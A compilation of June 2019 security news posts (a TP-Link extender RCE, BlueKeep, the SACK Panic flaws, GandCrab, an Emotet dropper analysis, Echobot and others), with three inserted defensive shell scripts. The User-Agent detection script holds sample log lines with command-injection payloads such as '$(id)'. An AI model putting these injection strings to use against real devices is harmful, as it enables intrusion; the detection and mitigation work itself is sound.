A zero-day vulnerability affects multiple models of TP-Link Wi-Fi extenders, it could be exploited to remotely execute code.

Security expert Grzegorz Wypych from IBM X-Force found a zero-day flaw that affects multiple models of TP-Link Wi-Fi extenders.

The Wi-Fi extenders capture the Wi-Fi signal from the main network device and rebroadcast it to areas where the signal is weak.


The vulnerability discovered by the expert could be exploited to remotely execute code on vulnerable devices and gain complete control over them, commanding the device with the same privileges as its legitimate user.

“As part of a recent series of vulnerabilities discovered in home routers, IBM X-Force researcher Grzegorz Wypych discovered a zero-day flaw in a TP-Link Wi-Fi extender.” reads the advisory published by IBM. “If exploited, this remote code execution (RCE) vulnerability can allow arbitrary command execution via a malformed user agent field in HTTP headers.”

The RCE flaw affects TP-Link Wi-Fi Extender models RE365, RE650, RE350 and RE500 running firmware version 1.0.2, build 20180213.

The flaw could be exploited by an unauthenticated remote attacker; the attack doesn’t require privilege escalation, since all processes on the vulnerable devices already run with root-level access.

Like many routers, TP-Link’s Wi-Fi extenders run on the MIPS architecture, and the zero-day flaw can be triggered by sending a malformed HTTP request. Such a request can allow the execution of any shell command on the targeted RE365 Wi-Fi extender.
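Because the trigger is a malformed User-Agent header, the request is visible wherever HTTP toward the extender is logged (a reverse proxy, an IDS sensor, or a capture on the same segment). The script below is an added example, not code from the article or from IBM X-Force: it scans access-log lines in combined log format (an assumption; the User-Agent is the last quoted field) and flags values carrying shell metacharacters. The log lines are constructed for the demonstration and are not real traffic. Note that a bare semicolon is deliberately not in the metacharacter set: ordinary browser strings such as `Mozilla/5.0 (X11; Linux x86_64)` contain one, so it would only produce noise.

```shell
#!/bin/sh
# Added example (not from the article or IBM X-Force): a detection pass over
# HTTP access logs for User-Agent values carrying shell metacharacters, the
# kind of "malformed user agent field" the advisory describes.
# Assumption: combined log format, User-Agent as the last quoted field.

# Constructed sample log lines (NOT real traffic). Lines 3 and 4 carry a
# command substitution and a backtick pair; lines 1 and 2 are benign.
SAMPLE_LOG='192.0.2.10 - - [18/Jun/2019:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.20 - - [18/Jun/2019:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/7.64.0"
198.51.100.5 - - [18/Jun/2019:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0; $(id)"
198.51.100.6 - - [18/Jun/2019:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "x`id`y"'

# user_agent LINE
# Prints the last double-quoted field of a combined-format log line.
user_agent() {
    printf '%s\n' "$1" | sed -n 's/.*"\([^"]*\)"[[:space:]]*$/\1/p'
}

# is_suspicious_ua UA
# Returns 0 when the User-Agent contains a shell metacharacter sequence.
# A lone ';' is excluded on purpose: legitimate browser strings use it.
is_suspicious_ua() {
    case "$1" in
        *'`'*|*'$('*|*'${'*|*'|'*|*'&&'*) return 0 ;;
        *) return 1 ;;
    esac
}

# flag_suspicious LOG
# Prints "<client ip><TAB><user agent>" for every suspicious line.
flag_suspicious() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        ua=$(user_agent "$line")
        if is_suspicious_ua "$ua"; then
            ip=${line%% *}
            printf '%s\t%s\n' "$ip" "$ua"
        fi
    done
}

# count_suspicious LOG
# Prints the number of flagged lines.
count_suspicious() {
    flag_suspicious "$1" | wc -l | tr -d ' '
}
```

Run `flag_suspicious "$(cat access.log)"` against a real log to get the client addresses to investigate; a hit against a device on the affected firmware (1.0.2, build 20180213) should be treated as a probable compromise until the extender is updated and checked.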

“The following image shows an open telnet session from a fully compromised device. After connecting to TCP port 4444 we were able to obtain root level shell on the Wi-Fi extender without any privilege escalation, with all processes running as root.” continues the analysis.


“The sort of impact one can expect from such unauthenticated access is, for example, requesting the device to browse to a botnet command and control server or an infection zone,”

The experts warn of the risk of massive attacks on IoT devices carried out through Mirai-like bots.

TP-Link has already released security patches to address the zero-day flaw; the vendor published separate updates for each of the impacted Wi-Fi extender models (RE365, RE500, RE650, RE350).

Pierluigi Paganini

(SecurityAffairs – TP-Link Wi-Fi extenders, hacking)


Researcher leaked a dataset of over 7,000,000 transactions scraped from the Venmo public API

Researcher leaked online a dataset containing over 7,000,000 transactions scraped from the Venmo public API

Venmo is a digital wallet app owned by PayPal that lets you make and share payments with friends.

In August 2016, security expert Martin Vigo devised a method to abuse an optional SMS-based feature that allowed users to authorize payments by replying to an SMS message with a provided 6-digit code. An attacker with physical access to the victim’s iPhone could steal funds from his account.

The attack technique leverages the following iOS features, which are enabled by default:

  • The Siri virtual assistant that allows replying to text messages from a locked device;
  • The text message preview that allows displaying part of the message on the display of a locked device’s screen.

In the attack scenario devised by the expert, the attacker sends a ‘reply-to-pay’ message to his victim’s locked mobile phone, and then leverages Siri to authorize the transactions. The expert explained that an attacker could steal up to $2,999.99 per week from the victim. The development team at Venmo addressed the issue by removing the SMS reply-to-pay feature.

Last year, the researcher Hang Do Thi Duc reported that she was able to access 207,984,218 Venmo transactions by visiting a public URL.

The public data includes names, dates, pictures and messages sent; Hang Do Thi Duc was able to build a profile for some users, such as two identified by the monikers ‘The Cannabis Retailer’ and ‘The cord dealer.’ She described The Cannabis Retailer as follows:

“With access to the first name,” she wrote, “I could infer that this person was male. I was also able to determine that he operates out of Santa Barbara, California. You might wonder how: some of his customers have a Facebook URL as their profile picture which includes their Facebook ID and so it was easy for me to see where some of them, and therefore the protagonist of this story as well, live… He registered on January 24, 2017, a day before his first transaction, and had a total of ?943 transactions in 2017.”

Time has passed, but Venmo continues to provide a public stream of users’ transactions.

Last week, researcher Dan Salmon published on GitHub details of more than 7 million new transactions scraped from Venmo between July and September 2018, in October 2018, and in January and February 2019. He decided to publish the dataset to warn Venmo users that their data is publicly available.

“This is a dataset of over 7,000,000 transactions scraped from the Venmo public API. Venmo is an app which allows users to easily send and receive money.” wrote Salmon.

“I am releasing this dataset, in order to bring attention to Venmo users that all of this data is publicly available for anyone to grab without even an API key. There is some very valuable data here for any attacker conducting OSINT research.”

Anyone could analyze this dataset and profile the users, posing a serious threat to them.

Experts suggest that Venmo users set their transactions to ‘private’; in this way the platform will not share a transaction anywhere other than your own personal feed and, if it is a payment to another user, the feed of the other person in the payment.


To update your privacy settings on the web, first log in to venmo.com. Then navigate to Settings → Privacy and select your preferred default privacy setting. Finally, make sure to click Save Settings.

Pierluigi Paganini

(SecurityAffairs – Venmo, privacy)


DHS also issued an alert for the Windows BlueKeep flaw

The Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. DHS on Monday issued an alert for the BlueKeep Windows flaw (CVE-2019-0708).

After Microsoft and the US NSA, the Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. DHS on Monday issued an alert for the BlueKeep Windows flaw (CVE-2019-0708).

Experts at the CISA Agency successfully exploited the BlueKeep flaw on a machine running Windows 2000. The agency urges Microsoft users and administrators to install security patches, disable unnecessary services, enable Network Level Authentication (NLA) if available, and block TCP port 3389.

Below an excerpt from the security advisory:

“CISA encourages users and administrators review the Microsoft Security Advisory [3] and the Microsoft Customer Guidance for CVE-2019-0708 [4] and apply the appropriate mitigation measures as soon as possible:

  • Install available patches. Microsoft has released security updates to patch this vulnerability. Microsoft has also released patches for a number of OSs that are no longer officially supported, including Windows Vista, Windows XP, and Windows Server 2003. As always, CISA encourages users and administrators to test patches before installation.”

For OSs that do not have patches or systems that cannot be patched, other mitigation steps can be used to help protect against BlueKeep:

  • Upgrade end-of-life (EOL) OSs. Consider upgrading any EOL OSs no longer supported by Microsoft to a newer, supported OS, such as Windows 10.
  • Disable unnecessary services. Disable services not being used by the OS. This best practice limits exposure to vulnerabilities.  
  • Enable Network Level Authentication. Enable Network Level Authentication in Windows 7, Windows Server 2008, and Windows Server 2008 R2. Doing so forces a session request to be authenticated and effectively mitigates against BlueKeep, as exploit of the vulnerability requires an unauthenticated session.
  • Block Transmission Control Protocol (TCP) port 3389 at the enterprise perimeter firewall. Because port 3389 is used to initiate an RDP session, blocking it prevents an attacker from exploiting BlueKeep from outside the user’s network. However, this will block legitimate RDP sessions and may not prevent unauthenticated sessions from being initiated inside a network.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with the May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that malware authors could exploit to create malicious code with WannaCry-like capabilities.

As explained by Microsoft, the vulnerability can be exploited without user interaction, which makes it possible for wormable malware to spread in an uncontrolled way across target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Experts believe it is just a matter of time before threat actors exploit the flaw in the wild.

“Right now, it is only a matter of time until someone publishes a working exploit or a malware author starts selling one on the underground markets. Should that happen, it will probably become very popular among less skilled cybercriminals and also a lucrative asset for its originator,” reads the post published by ESET.

“BlueKeep will also show if organizations around the world learned a lesson after the large 2017 outbreaks and improved their security posture and patching routines.”

It has been estimated that roughly one million devices are vulnerable to attacks exploiting the BlueKeep Windows vulnerability and hackers are ready to hit them.

Most of the vulnerable systems are in China, followed by the United States.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Don’t waste time, patch your system!

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)


Multiple DoS vulnerabilities affect Linux and FreeBSD

A Netflix researcher has identified several TCP networking vulnerabilities in the FreeBSD and Linux kernels that could be used to trigger a DoS condition.

Jonathan Looney, a security expert at Netflix, found three Linux DoS vulnerabilities, two of them related to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities, and one related only to MSS.

The most severe flaw, dubbed SACK Panic, could be exploited to remotely trigger a DoS condition and reboot vulnerable systems. The kernel panic flaw affects recent Linux kernels.


The denial-of-service flaw SACK Panic is tracked as CVE-2019-11477 and rated important severity, with a CVSS3 base score of 7.5.

“Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels.” reads the Netflix’s NFLX-2019-001 security advisory.

“The vulnerabilities specifically relate to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities. The most serious, dubbed “SACK Panic,” allows a remotely-triggered kernel panic on recent Linux kernels.

There are patches that address most of these vulnerabilities. If patches can not be applied, certain mitigations will be effective. We recommend that affected parties enact one of those described below, based on their environment.”

The SACK Panic vulnerability affects Linux kernels 2.6.29 and later; an attacker could exploit it by sending a crafted sequence of SACK segments on a TCP connection with a small TCP MSS value, triggering an integer overflow that leads to a kernel panic.

“Apply the patch PATCH_net_1_4.patch. Additionally, versions of the Linux kernel up to, and including, 4.14 require a second patch PATCH_net_1a.patch,” continues Netflix Information Security’s advisory.

Below the advisories published by major Linux distros and cloud service providers:

The good news for Linux users is that most of the issues found by Netflix were already addressed with security patches. Mitigations are also available for those systems that cannot be immediately patched.

Users and administrators can mitigate the flaw by completely disabling SACK processing on the system or by blocking connections with a low MSS. Netflix Information Security provided a series of filters to block such connections. Another mitigation consists of disabling TCP probing.
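The two host-side mitigations named above, turned into something an administrator can run, as an added example that is not part of the article or of Netflix’s advisory. It assumes a Linux host with `sysctl` and `iptables`/`ip6tables`; the MSS cut-off of 500 bytes is an assumption modelled on the threshold used in Netflix’s published filters, and the note that the MSS filter only works with TCP MTU probing disabled (`net.ipv4.tcp_mtu_probing=0`) is the “disabling TCP probing” mitigation the article mentions. Nothing is changed on the system unless `apply_mitigations` is run as root; `sack_enabled` and `report` only read the kernel knob, and accept a file path so they can be exercised against a constructed file.

```shell
#!/bin/sh
# Added example (not from the article or Netflix's advisory): the host
# mitigations for the SACK issues, as a check and as the commands to apply
# them. Assumptions: Linux, sysctl and iptables available; MSS cut-off 500.

# sack_enabled [FILE]
# Returns 0 if SACK processing is on. FILE defaults to the kernel knob;
# pass another path to test against a constructed file.
sack_enabled() {
    f=${1:-/proc/sys/net/ipv4/tcp_sack}
    [ -r "$f" ] && [ "$(cat "$f")" = "1" ]
}

# low_mss_filter_rules
# Prints the rules that drop SYN segments advertising an MSS of 1-500
# bytes (assumed threshold), i.e. the "block low MSS" mitigation.
low_mss_filter_rules() {
    cat <<'EOF'
iptables -I INPUT -p tcp --tcp-flags SYN SYN -m tcpmss --mss 1:500 -j DROP
ip6tables -I INPUT -p tcp --tcp-flags SYN SYN -m tcpmss --mss 1:500 -j DROP
EOF
}

# apply_mitigations MODE   (run as root)
#   nosack    : disable SACK processing entirely (simplest, costs throughput
#               on lossy links)
#   mssfilter : keep SACK, drop low-MSS connections, and turn off TCP MTU
#               probing, without which the filter is not effective
apply_mitigations() {
    case "$1" in
        nosack)
            sysctl -w net.ipv4.tcp_sack=0
            ;;
        mssfilter)
            low_mss_filter_rules | sh
            sysctl -w net.ipv4.tcp_mtu_probing=0
            ;;
        *)
            echo "usage: apply_mitigations nosack|mssfilter" >&2
            return 2
            ;;
    esac
}

# report [FILE]
# One-line verdict for fleet checks; returns 1 while SACK is still enabled.
report() {
    if sack_enabled "$1"; then
        echo "SACK enabled: patch the kernel or apply a mitigation"
        return 1
    fi
    echo "SACK disabled"
}
```

Patching remains the real fix; `report` is there so a configuration-management run can tell which unpatched hosts still have no mitigation in place. Both mitigations have a cost (SACK improves recovery on lossy paths, and the MSS filter drops any legitimate peer that negotiates a very small MSS), which is why the advisory offers them as alternatives for hosts that cannot be patched promptly.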

The remaining issues are tracked as CVE-2019-11478 and CVE-2019-11479 respectively; both were rated moderate severity and affect all Linux versions. CVE-2019-11478 can be exploited by sending a crafted sequence of SACKs that fragments the TCP retransmission queue. CVE-2019-11479 can be exploited to trigger a DoS state by sending crafted packets with low MSS values that cause excessive resource consumption.

CVE-2019-5599, aka SACK Slowness, affects FreeBSD 12 using the RACK TCP Stack. An attacker could exploit it by delivering a crafted sequence of SACKs which will fragment the RACK send map.

“It is possible to send a crafted sequence of SACKs which will fragment the RACK send map. An attacker may be able to further exploit the fragmented send map to cause an expensive linked-list walk for subsequent SACKs received for that same TCP connection.” continues the advisory.

CVE-2019-5599 can be addressed by applying “split_limit.patch and set the net.inet.tcp.rack.split_limit sysctl to a reasonable value to limit the size of the SACK table.”

Admins could also temporarily disable the RACK TCP stack.

“Good system and application coding and configuration practices (limiting write buffers to the necessary level, monitoring connection memory consumption via SO_MEMINFO, and aggressively closing misbehaving connections) can help to limit the impact of attacks against these kinds of vulnerabilities,” concludes Netflix Information Security.

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)


A free Decryptor tool for GandCrab Ransomware released

Good news for the victims of the latest variants of the GandCrab ransomware, NoMoreRansomware released a free decryption tool.

Victims of the latest variants of the GandCrab ransomware can now decrypt their files for free using a decryptor tool released on the NoMoreRansom website. The tool works with versions 5 to 5.2 of the ransomware, as well as versions 1 and 4.

“On 17 June, a new decryption tool for the latest version of the most prolific ransomware family GandCrab has been released free of charge on www.nomoreransom.org.” reads the press release published by Europol. “This tool allows victims of ransomware to regain access to their information encrypted by hackers, without having to pay demanded ransoms.”

The GandCrab decryptor tool is the result of a partnership between law enforcement agencies from Austria (Bundeskriminalamt – BMI), Belgium (Federal Computer Crime Unit), Bulgaria (General Directorate Combating Organized Crime – Cybercrime Department), France (Police Judiciaire de Paris – Befti), Germany (LKA Baden-Württemberg), the Netherlands (High Tech Crime Unit), Romania (DIICOT), the United Kingdom (NCA and Metropolitan Police), the United States (FBI) and Europol and its Joint Cybercrime Action Taskforce (J-CAT), together with the private partner Bitdefender.

The ransomware appeared in the threat landscape in early 2018, when experts at the cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab. The RaaS was advertised in the Russian hacking community on the dark web, and researchers noticed that its authors leveraged the RIG and GrandSoft exploit kits to distribute the malware.

In little more than a year its operators released several versions with numerous enhancements, but in June they announced they were shutting down the operation, and affiliates were told to stop distributing the ransomware.


In October 2018, experts at the Cybaze Z-Lab analyzed one of the latest iterations of the infamous GandCrab ransomware, version 5.0.

The operators claimed to have generated more than $2 billion in ransom payments, earning on average $2.5 million per week. They also declared a net profit of $150 million, which they say they have now invested in legal activities.

Experts at BitDefender pointed out that not all victims are treated equally:

“GandCrab prioritizes ransomed information and sets individual pricing by type of victim.” reads a blog post published by BitDefender. “An average computer costs from $600 and $2,000 to decrypt, and a server decryption costs $10,000 and more. While helping victims with decryption, we’ve seen ransom notes asking for as much as $700,000, which is quite a price for one wrong click,”

According to Europol, previously released tools for the GandCrab ransomware have helped more than 30,000 victims recover their data for free and saved roughly $50 million in unpaid ransoms.

The joint efforts have also weakened the operators’ position on the cyber crime market and have led to the demise and shutdown of the operation by authorities. Bitdefender and McAfee experts provided a significant contribution to the fight against this threat. 

You can download the GandCrab decryption tool for free at the following address:

https://labs.bitdefender.com/wp-content/uploads/downloads/gandcrab-removal-tool-v1-v4-v5/

Pierluigi Paganini

(SecurityAffairs – ransomware, decryptor tools)


NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid

According to The New York Times, the United States planted destructive malware in Russia’s electric power grid.

The New York Times, citing current and former government officials, revealed that the United States planted a potentially destructive malware in Russia’s electric power grid.

U.S. cyber units have been targeting the Russian power grid with reconnaissance operations since at least 2012, but recently they have also carried out more offensive operations. According to the officials, US cyber soldiers attempted to deploy destructive malware inside the Russian power grid.

“Since at least 2012, current and former officials say, the United States has put reconnaissance probes into the control systems of the Russian electric grid.” states the NYT.

“But now the American strategy has shifted more toward offense, officials say, with the placement of potentially crippling malware inside the Russian system at a depth and with an aggressiveness that had never been tried before.”


The hacking operations aim to warn the Russian Government about the cyber capabilities of U.S. Cyber Command and could serve as a deterrent to the continuous interference attributed to Russian state-sponsored hackers. It is important to highlight that there is no evidence that the malware used by the US cyber units caused any disruption to the target systems.

President Trump publicly denied the revelation made by the NYT.

The New York Times added that, according to two US officials, Trump was not fully briefed about the cyber operations conducted by US Cyber Command. High officials inside US Cyber Command might have withheld the details of the cyber attacks inside the Russian power grid, fearing a possible reaction of the President due to his relationship with President Putin.

“Two administration officials said they believed Mr. Trump had not been briefed in any detail about the steps to place “implants” — software code that can be used for surveillance or attack — inside the Russian grid.” continues the newspaper.

“Pentagon and intelligence officials described broad hesitation to go into detail with Mr. Trump about operations against Russia for concern over his reaction — and the possibility that he might countermand it or discuss it with foreign officials, as he did in 2017 when he mentioned a sensitive operation in Syria to the Russian foreign minister.”

In July 2018, the US Department of Homeland Security declared that Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and continue to target them.

“In the past few months, Cyber Command’s resolve has been tested. For the past year, energy companies in the United States and oil and gas operators across North America discovered their networks had been examined by the same Russian hackers who successfully dismantled the safety systems in 2017 at Petro Rabigh, a Saudi petrochemical plant and oil refinery.” concludes the NYT.

“The question now is whether placing the equivalent of land mines in a foreign power network is the right way to deter Russia. While it parallels Cold War nuclear strategy, it also enshrines power grids as a legitimate target.”

Pierluigi Paganini

(SecurityAffairs – Russian power grid, hacking)


From Targeted Attack to Untargeted Attack

Today I’d like to share an interesting and heavily obfuscated malware sample which made me think about the meaning of ‘Targeted Attack’.

Nowadays a Targeted Attack is mostly understood as one aimed at state assets or business areas. For example, a targeted attack might address the naval industry (MartyMcFly is definitely a great example) or USA companies (Botnet Against USA, Canada and Italy is another great example); such attacks are built around specific target sectors. When I looked at the following sample (which is a clear stereotype of an increasing trend of similar threats) I noticed a paradigm shift from “what to target” to “what to untarget”. In other words, it looks like the attacker doesn’t have a clear vision of his desired victims but, on the contrary, has very clear intentions about which kind of victims must be avoided. But let’s start from the beginning.

Looking through the public samples submitted to Yomi (Yoroi’s public sandbox system), the following one caught my eye (sha256: c63cfa16544ca6998a1a5591fee9ad4d9b49d127e3df51bd0ceff328aa0e963a).

Public Submitted Sample on Yomi

The file looks like a common XLS file with a low antivirus detection rate, as shown in the following image (6/63).

Antivirus Detection Rate

Taking a closer look at the Office file, it’s easy to spot “Auto Open” procedures in VBA. The initial script is obfuscated through integer conversion and variable concatenation. A simple breakpoint and a message box to externalize the real payload are enough to expose the second stage, which happens to be written in PowerShell.

Deobfuscated Stage1 to Obfuscate Stage2

The second stage is obfuscated through function array enumeration and integer conversion as well. It took some minutes to work out how to move from the obfuscated version to a plain-text readable format, as shown in the next picture.

Stage2 Obfuscated
Stage2 DeObfuscated

Here comes the interesting side of the entire attack chain (at least from my personal point of view). As you can see from the deobfuscated Stage2 code (previous image), two main objects are downloaded and run from external sources. The ‘*quit?’ object downloads a Windows PE (Stage3_a) and runs it, while the ‘need=js’ object returns an additional obfuscated JavaScript stage; let’s call it Stage3_b. We’ll take care of those stages later on; for now let’s focus on the initial conditional branch, which discriminates the real behavior from the fake behavior, in other words it decides whether to run or stop the execution of the real behavior. The second side of the conditional branch is quite normal: match "VirtualBox|VMware|KVM" tries to avoid execution on virtual environments (to evade detection and analysis). The first side is quite interesting: (GET-UICulture).Name -match "RO|CN|UA|BY|RU" locates the victim machine and decides to attack everybody except Romania, Ukraine, China, Russia and Belarus. So we are facing a one’s complement of a targeted attack. I’d like to call it an “untargeted” attack, which is not an opportunistic attack. Many questions come to mind, for example why not attack those countries? Does the attacker fear those countries, or does the attacker belong to that area? Probably we’ll never get answers to such questions, but we can appreciate this intriguing attack behavior. (BTW, I’m aware this is not the first sample with this characteristic, but I do know that it’s an increasing trend.) But let’s move on with the analysis.
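The two gates just described (a locale check that exempts a list of countries and a virtual-machine check) are a useful hunting signal once a PowerShell stage has been decoded. The script below is an added triage heuristic written for this post, not code from the author, from Yoroi, or from the sample; it assumes the input is already-deobfuscated script text, as obtained above after the Stage2 decoding. The sample text is constructed to mirror the described checks (the `$model` variable and the placeholder comment are inventions) and is not the actual stage.

```shell
#!/bin/sh
# Added example (not from the article or Yoroi): a triage heuristic for
# decoded PowerShell stages that reports the two gating conditions the
# analysis describes, a country-code exemption on Get-UICulture and a
# VirtualBox/VMware/KVM check. Assumption: input is plain-text script.

# Constructed stage text modelled on the description above (NOT the real
# sample). $model and the trailing comment are placeholders.
SAMPLE_STAGE='if ((Get-UICulture).Name -match "RO|CN|UA|BY|RU") { exit }
if ($model -match "VirtualBox|VMware|KVM") { exit }
# ... download and run placeholders ...'

# locale_gate TEXT
# Prints the country-code alternation matched against Get-UICulture, or
# nothing when the script has no such check.
locale_gate() {
    printf '%s\n' "$1" \
        | sed -n 's/.*Get-UICulture)\.Name -match "\([^"]*\)".*/\1/p' \
        | head -n 1
}

# exempted_countries TEXT
# One ISO country code per line, taken from the locale gate.
exempted_countries() {
    locale_gate "$1" | tr '|' '\n' | grep -v '^$'
}

# vm_gate TEXT
# Returns 0 when a VirtualBox/VMware/KVM match is present.
vm_gate() {
    printf '%s\n' "$1" | grep -qiE -- '-match "[^"]*(virtualbox|vmware|kvm)'
}

# triage TEXT
# Prints one line per gate found; returns 1 when any gate is present so
# the script can drive a pipeline (e.g. escalate the sample for review).
triage() {
    hits=0
    if [ -n "$(locale_gate "$1")" ]; then
        echo "locale gate: exempts $(exempted_countries "$1" | tr '\n' ' ')"
        hits=$((hits + 1))
    fi
    if vm_gate "$1"; then
        echo "vm gate: virtual machine check present"
        hits=$((hits + 1))
    fi
    [ "$hits" -eq 0 ] && { echo "no gating found"; return 0; }
    return 1
}
```

The locale gate is the more telling of the two for this “untargeted” pattern: a VM check alone is routine evasion, while an explicit exemption list tells you which populations the operator wants to avoid, and the extracted codes can be recorded as an attribute of the sample alongside its hash.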

Stage3_a

Stage3_a is clearly the last infection stage. It looks like a plain Emotet according to many antivirus engines, so I won’t invest time in this well-known malware.

Stage3_b

This stage looks like a quite big and obfuscated JavaScript code. The obfuscation implements three main techniques:

  • Encoded strings. The strings have been encoded in different ways, from “to Integer” to “Hexadecimal”.
  • String concatenation and dynamic evaluation. Using eval to dynamically extract values which are then used to decode more strings.
  • String substitutions. Through find-and-replace functions, and using loops to extract sub-strings, the attacker hides the clear text inside charset noise.

After some “hand work”, the deobfuscated Stage3_b finally came out. The following image shows the deobfuscated version next to the obfuscated one. We are still facing one more obfuscated stage, let’s call it Stage4_b, which happens to be, again, an obfuscated PowerShell script… how about that!?

Stage3_b Obfuscated
Stage3_b Deobfuscated (obfuscated Stage4_b)


Stage4_b uses the same obfuscation techniques seen in Stage2, so let’s apply the same deobfuscation technique. Hmmm, but… wait a minute… we already know this one: it’s the deobfuscated Stage2! So we have two command and control servers serving the final launching script and getting persistence on the victim.

Deobfuscated Stage4_b

Conclusion

Even if the sample is quite interesting per se – given its low AV detection rate – that is not my actual point today. What is interesting is the introduction of another “targeting” state. We were accustomed to seeing targeted attacks, meaning attacks aimed at specific industries, sectors or states, and opportunistic attacks, meaning attacks spread all over the world without specific targets. Today we might introduce one more attack type, the untargeted attack, meaning an attack on everybody except specific assets, industries or states (as in the analyzed case).

Further technical details, including IoCs and Yara rules, are reported in the original post published on Marco Ramilli’s blog:

https://marcoramilli.com/2019/06/17/from-targeted-attack-to-untargeted-attack/

About the author Marco Ramilli

I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division) where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I have also been put in charge of testing the uVote voting system for the Italian Ministry of Homeland Security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experience by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centres I’ve ever experienced! Now I technically lead Yoroi, defending our customers, strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – targeted attack, hacking)




Hacker is targeting DNA sequencer applications from Iranian IP address

Threat actors are targeting Web-based DNA sequencer applications leveraging a still-unpatched zero-day to take over the targeted systems.

Starting from June 12, 2019, the researcher Ankit Anubhav from NewSky Security, observed threat actors targeting Web-based DNA sequencer applications. The attackers are leveraging a still-unpatched zero-day vulnerability, tracked as CVE-2017-6526, to gain full control over the targeted systems.

The vulnerability in dnaLIMS was reported to the vendor in 2017, but it is still unpatched.

The attackers are scanning the Internet for dnaLIMS, a web-based application used to handle DNA sequencing operations; these systems are used in the research industry. The attacks originated from the 2.176.78.42 IP address, which is located in Iran.

“From June 12 – 14, we saw regular attacks from 2.176.78.42 , an IP located in Iran, utilizing CVE-2017-6526, an issue in dnaTools dnaLIMS 4-2015s13. According to dnatools.com, dnaLIMS™ is a Web based bioinformatics LIMS that provides scientists and researches with hardware independent software tools for processing and managing DNA sequencing requests.” reads a blog post published by the expert.

The hackers leverage the vulnerability to bind a shell and take control of the web server.

Why DNA sequencing apps?

Attackers could be interested in stealing hashes of DNA sequences from the application’s database to resell them on the dark web, or in compromising the servers to add them to a botnet.

We cannot exclude that the threat actor behind these attacks is using exploits available online at random, in an attempt to compromise the largest possible number of systems.

It is still unclear why attackers are targeting DNA sequencing apps: the number of these devices is limited (only a few tens of devices are exposed online) and it is unlikely that hackers want to use the compromised systems to carry out DDoS attacks.

“The exact motives of the attacker(s) is unknown. Unlike an IPCamera or Router based IoT device, these are very unique devices installed in scientific, academic and medical institutions. As a result, the number of such devices is not very high and might not help greatly in DDoS.” concludes the expert.

“However, successful exploitation and DNA theft in specific cases can be fruitful. Either it can be sold in black market, or a high profile attacker can actually be looking for a specific persons’ data.

We are not aware of a patch for this bug. In fact, when we had a look at the original disclosure by ShoreBreakSecurity, we saw a funny disclosure response by the vendor, indicating they don’t take DNA theft seriously.”

The expert also analyzed historical activity related to the attacker’s IP address and discovered that it was also associated with nmap scans and with the use of two other exploits, one for Zyxel routers (CVE-2017-6884) and one for the Apache Struts flaw (CVE-2017-5638).

Pierluigi Paganini

(SecurityAffairs – DNA sequencer applications, hacking)


Bella Thorne published her private nude photos before a hacker that was threatening her

Bella Thorne is the latest victim of a sextortion attack: in a case similar to the Fappening saga, a hacker threatened the actress with publishing her private nude photos.

The hacker first obtained nude photos of Bella Thorne and then threatened to leak the pictures online, but she gave an unsettling answer.

Bella Thorne tweeted the stolen photos herself, putting the hacker out of play.

The actress explained that she had been harassed for the past 24 hours by a hacker who had accessed her nude photos.

[Image: Bella Thorne’s message]

The above message suggests that Bella Thorne has already reported to the authorities the sextortion attempts.

“For too long I let a man take advantage of me over and over and I’m f**king sick of it, I’m putting this out because it’s MY DECISION NOW U DONT GET TO TAKE YET ANOTHER THING FROM ME.” wrote the actress.

“I can sleep tonight better knowing I took my power back. U can’t control my life u never will.”

According to BleepingComputer, the hacker also shared with Thorne nude photos of other celebrities.

Pierluigi Paganini

(SecurityAffairs – Thorne, hacking)


New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits

Operators behind the Echobot botnet added new exploits to infect IoT devices, and also the enterprise apps Oracle WebLogic and VMware SD-WAN.

Recently a new botnet, tracked as Echobot, appeared in the threat landscape; its operators are adding new exploits to infect a broad range of systems, including IoT devices and the enterprise apps Oracle WebLogic and VMware SD-WAN.

The Echobot botnet was first detected by experts at Palo Alto Networks early this month; the botnet is based on the dreaded Mirai botnet. At the time of its discovery, operators had added 8 new exploits, but currently it includes 26 exploits.

The popular expert Larry Cashdollar, from Akamai’s Security Intelligence Response Team (SIRT), spotted a new version of the Echobot botnet that counts 26 different exploits.

“I recently came across an updated version of the Echobot binary that had some interesting additions. The first binary I found was compiled for ARM and still had the debugging information intact, which made it a little easier to analyze. While examining that binary, I discovered the system hosting the binaries and downloaded an x86 version that also still had the debugging symbols intact.” wrote the expert.

“I counted 26 different exploits that were being used in the spread of this botnet. Most were well-known command execution vulnerabilities in various networked devices.”

Cashdollar published a table comparing the two versions of Echobot and the exploits they use.

[Image: table comparing the two Echobot versions and the exploits they use]

The latest Echobot variant targets routers, network-attached storage devices (NAS), network video recorders (NVR), IP cameras, wireless presentation systems, and VoIP phones.

